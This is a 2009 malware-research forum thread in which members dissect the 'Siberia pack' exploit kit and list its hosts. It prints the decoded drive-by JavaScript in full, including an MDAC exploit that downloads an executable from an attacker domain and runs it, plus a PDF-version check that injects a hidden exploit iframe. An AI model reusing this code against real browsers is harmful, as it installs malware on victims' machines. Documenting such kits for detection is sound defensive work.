Author Topic: Siberia pack  (Read 8712 times)

0 Members and 1 Guest are viewing this topic.

December 20, 2009, 09:06:14 pm
Read 8712 times

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Just discovered another exploit kit.

According to its control panel
Code: [Select]
www.useranalyticsreporting.net/ir/pack/stat.phpit's "Siberia pack"

I wouldn't label it "kit", because it contains only a single exploit for MDAC.

Obfuscated script starts here:
Code: [Select]
www.useranalyticsreporting.net/ir/pack/
This is the decoded script
Code: [Select]
                      url = 'http://www.useranalyticsreporting.net:80/ir/pack/exe.php?spl=MDAC';
                                            function mdac() {
  url = '';
                      function CreateO(o,n){
                                var r=null;
                                try{r=o.CreateObject(n)}catch(e){}
                                if(!r){try{r=o.CreateObject(n,'')}catch(e){}}
                                if(!r){try{r=o.CreateObject(n,'','')}catch(e){}}
                                if(!r){try{r=o.GetObject('',n)}catch(e){}}
                                if(!r){try{r=o.GetObject(n,'')}catch(e){}}
                                if(!r){try{r=o.GetObject(n)}catch(e){}}
                                return(r);
                        }
                        function Go(a){
                                var eurl='http://www.useranalyticsreporting.net:80/ir/pack/exe.php?spl=MDAC';
                                var fname='hfdhfd.exe';
                                var fso=CreateO(a,'Scripting.FileSystemObject')
                                var sap=CreateO(a,'Shell.Application');
                                var x=CreateO(a,'ADODB.Stream');
                                var nl=null;
                                fname=fso.BuildPath(fso.GetSpecialFolder(2),fname);
                                x.Mode=3;
                                try{nl=CreateO(a,'Micr'+'osoft.XMLH'+'TTP');nl.open('GET',eurl,false);}
                                catch(e){try{nl=CreateO(a,'MSXML2.XMLHTTP');nl.open('GET',eurl,false);}
                                catch(e){try{nl=CreateO(a,'MSXML2.ServerXMLHTTP');nl.open('GET',eurl,false);}
                                catch(e){try{nl=new XMLHttpRequest();nl.open('GET',eurl,false);}
                                catch(e){return 0;}}}}
                                x.Type=1;
                                nl.send(null);
                                rb=nl.responseBody;
                                x.Open();
                                x.Write(rb);
                                x.SaveTofile(fname,2);
                                sap.ShellExecute(fname);
                                return 1;
                        }
                        function mdac() {
                                var i=0;
                                var target=new Array(
                                'BD96C556-65A3-11D0-983A-00C04FC29E36',
                                'BD96C556-65A3-11D0-983A-00C04FC29E30',
                                'AB9BCEDD-EC7E-47E1-9322-D4A210617116',
                                '0006F033-0000-0000-C000-000000000046',
                                '0006F03A-0000-0000-C000-000000000046',
                                '6e32070a-766d-4ee6-879c-dc1fa91d2fc3',
                                '6414512B-B978-451D-A0D8-FCFDF33E833C',
                                '7F5B7F63-F06F-4331-8A26-339E03C0AE3D',
                                '06723E09-F4C2-43c8-8358-09FCD1DB0766',
                                '639F725F-1B2D-4831-A9FD-874847682010',
                                'BA018599-1DB3-44f9-83B4-461454C84BF8',
                                'D0C07D56-7C69-43F1-B4A0-25F5A11FAB19',
                                'E8CCCDDF-CA28-496b-B050-6C07C962476B',null);
                                while(target[i]){
                                        var a=null;
                                        a=document.createElement('object');
                                        a.setAttribute('classid','clsid:'+target[i]);
                                        if(a){try{var b=CreateO(a,'Shell.Application');if(b){Go(a);}}catch(e){}}
                                        i++;
                                }
                                return 0;
                        }
function lala1() {
return mdac();
}
function lala2() {
return lala1();
}
                        function lala3() {
return lala2();
}
function lala4() {
return lala3();
}
function lala5() {
return lala4();
}
lala5();
}
mdac();


The payload isn't detected by any av product currently.
http://www.virustotal.com/analisis/1d25db57afd24594c98399e1bfc24da13fc88f2a4367f0609753ef8fb2e726d1-1261341921
http://www.threatexpert.com/report.aspx?md5=8e36fdfa3a6fdc319d2fa8a5948fc481
Ruining the bad guy's day

December 20, 2009, 09:32:21 pm
Reply #1

Garlando

  • Full Member

  • Offline
  • ***

  • 40
contains pdf exploit too


December 20, 2009, 09:36:49 pm
Reply #2

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
contains pdf exploit too



Yes, you are right. I missed the second part of the script.

Code: [Select]
function i7WVT41lG441T() {
try {
var fFSllQ4 = document.createElement("object");
fFSllQ4.setAttribute("id","fFSllQ4");
fFSllQ4.setAttribute("classid","clsid:CA8A9780-280D-11CF-A24D-444553540000");
var yDViqkIoIr = fFSllQ4.GetVersions();
yDViqkIoIr = yDViqkIoIr.split(",");
yDViqkIoIr = yDViqkIoIr[4].split("=");
yDViqkIoIr = yDViqkIoIr[1];
eC5Y3hfycXHm2N = yDViqkIoIr.split(".");
eC5Y3hfycXHm2N = eC5Y3hfycXHm2N[0];
if ((eC5Y3hfycXHm2N <= 9) && (eC5Y3hfycXHm2N >= 6)) {
document.write("<iframe width='10' height='10' frameborder='0' src='exp/pdf.php'></iframe>");
}
} catch(e) {}
}
     i7WVT41lG441T();

Ruining the bad guy's day

December 20, 2009, 10:43:33 pm
Reply #3

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Malwareurl.com have also listed a Siberia pack today

Code: [Select]
traffic.banners.od.ua/p/
traffic.banners.od.ua/p/exp/pdf.php
traffic.banners.od.ua/p/exe.php?spl=PDF
traffic.banners.od.ua/p/stat.php
Ruining the bad guy's day

December 22, 2009, 05:47:30 pm
Reply #4

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Another one
Code: [Select]
traffic6.local-tc.com/us/control panel
Code: [Select]
traffic6.local-tc.com/us/stat.php
payload is a Zbot
http://www.virustotal.com/de/analisis/9cce5756e0956414144d6ca0079eca7f1e0281428bcf245598f1246edbc521f4-1261502233

Interesting fact :

related Zeus config file is hosted at priscillapresley.com
http://www.malwaredomainlist.com/mdl.php?search=priscillapresley.com
Ruining the bad guy's day

December 22, 2009, 05:53:46 pm
Reply #5

danielch1

  • Special Access
  • Newbie

  • Offline
  • *

  • 4
You can see the traffic from this url:
Code: [Select]
traffic6.local-tc.com/us/sell.php

December 22, 2009, 05:58:41 pm
Reply #6

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
You can see the traffic from this url:
Code: [Select]
traffic6.local-tc.com/us/sell.php

Nice one. Thanks.
Ruining the bad guy's day

December 26, 2009, 12:28:05 pm
Reply #7

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Ruining the bad guy's day

May 28, 2010, 05:04:35 pm
Reply #8

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Ruining the bad guy's day